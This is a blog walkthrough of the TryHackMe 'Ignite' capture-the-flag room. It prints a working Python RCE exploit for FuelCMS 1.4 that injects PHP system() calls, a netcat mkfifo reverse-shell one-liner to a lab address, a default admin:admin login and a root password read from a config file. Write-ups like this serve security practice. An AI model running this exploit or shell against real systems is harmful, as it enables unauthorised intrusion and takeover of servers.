Open in app

Sign in

Write

Sign in

Try Hack Me — Ignite

Pranav Joglekar
5 min readNov 6, 2020

Description:
A new start-up has a few issues with their web server.

Let’s deploy the machine, and connect to TryHackMe vpn, while the ip loads. Once we get the ip,(10.10.131.58, in my case). Navigate to the ip to browse through the website

Meanwhile run nmap to check for open ports:

nmap -sC -sS -p 0–1000 10.10.131.58

While nmap is running, let’s have a look at the website.

The website contains steps to configure a CMS — FuelCMS. It also contains the link to a login page for fuel CMS.

Lets run fuff on / and /fuel to brute-force for subdirectories.(Spoiler — You won’t find anything interesting)

In the meantime, let’s check the output of nmap to check if we have anything interesting.

Unfortunately nothing juicy here. We observe that only port 80 is open. The silver lining to this is that now we know that we can be sure that the flaws are definitely on the webserver, and on not on any other service.(I know the description says so, but better to be sure)

While ffuf runs, let’s search for well-known exploits on FuelCMS that we may be able to use.

Before that let’s just try username:admin & password:admin on the /fuel/ login page. I know it doesn’t work……

Wait it did. We are in. Yeahhhhhhh.

In any case, lets just have a look at the vulnerabilities. We may need the later.

A simple google search leads us to -

Yesss. A RCE. I think that should be enough for now. Wait — This works on FuelCMS version 1.4. Lets just confirm our version again. Thankfully its 1.4 too. Yup. This exploit should work.

Lets dig deeper into this exploit later. First, let us observe the admin panel.

Let’s try if we are able to add and access malicious php files somewhere, if we are, getting a shell is easy. Unfortunately, I tried “Pages”, “Blocks”, “Assets” and observed that we aren’t able to add .php(or other extensions). Feel free to try other approaches and reach out to me, if you find something.

0kay, so the admin panel wasn’t able to provide us with anything easy. Yes, we know that we can upload pdfs and images to the assets folder, which can be exploited, if certain php functions are called on the files, but we aren’t sure these functions are called, So, for now let’s pause here, with the admin panel and try with the RCE Exploit we found out.

The RCE Exploit(https://www.exploit-db.com/exploits/47138) is a kind of sql-injection vulnerability and allows code execution without any prerequisites. Seems easy lets try that.

First step is to download the exploit. We observe its a python file. We then modify the script a little to suit our requirements — we change the url to the ip of the machine(or the corresponding fuleCMS homepage url), and since we don’t require a proxy, we remove the part using the proxy. The modified file is:-

import requests
import urllib#url = "http://127.0.0.1:8881"
url = "http://10.10.68.231"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return startwhile 1:
 xxxx = raw_input('cmd:')
 burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
 #proxy = {"http":"http://127.0.0.1:8080"}
 r = requests.get(burp0_url)html = "<!DOCTYPE html>"
 htmlcharset = r.text.find(html)begin = r.text[0:20]
 dup = find_nth_overlapping(r.text,begin,2)print r.text[0:dup]

The next step is to run the file — python file_name.py

This provides us with a cmd> prompt. Lets test if it works.

cmd> ls

We observe a lot of gibberish and errors. Maybe it didn’t work. But wait, we observe something which looks like a list of files at the top. Lets confirm this.

cmd> ls /home

And we see www-data. Yes. It worked, we have command execution abilities on the machine. Yesss. Let’s check if we are able to get the user flag

cmd> cat /home/www-data/flag.txt

And there you have it. The user flag. Step 1 completed way to go. Paste the flag in THM. Celebrate a bit before we move unto the next task

Yes, we have RCE abilities, but it’s tiring, time-consuming and inconsistent to use this method to run commands, it would be great if we had a proper shell access. Lets do that first(Thanks to netcat)

On your work machine, start a netcat listener nc -lvnp <port>

I prefer the port 1234, so

nc -lvnp 1234

Then run the following command on the target machine(using the python script)

cmd> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.1.103 1234 >/tmp/f

If everything is successful, we should have a shell session on the netcat on host machine. Yeahhh

Now we need to escalate our privileges to root.

Lets search all SUID set files

find / -user root -perm -4000 2>/dev/null

We see that crontab is suid enabled. I tried to exploit it but was unsuccessfully. I couldn’t find anything which may give us sudo privileges. Seems we are stuck.

I cheated a little and refered another walkthrough and got to know that the root password is stored on some file on the FuelCMS configuration files. Let’s try to find the file.

After browsing a little, we find database.php in the file in fuel/applications/config

This file contains the root password.

We switch to root using su root and the cat the root flag to solve the room.

Thank you,

--

--

Pranav Joglekar

Written by Pranav Joglekar

0 Followers

Software Engineer | Full Stack Developer | Cyber Security Enthusiast

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams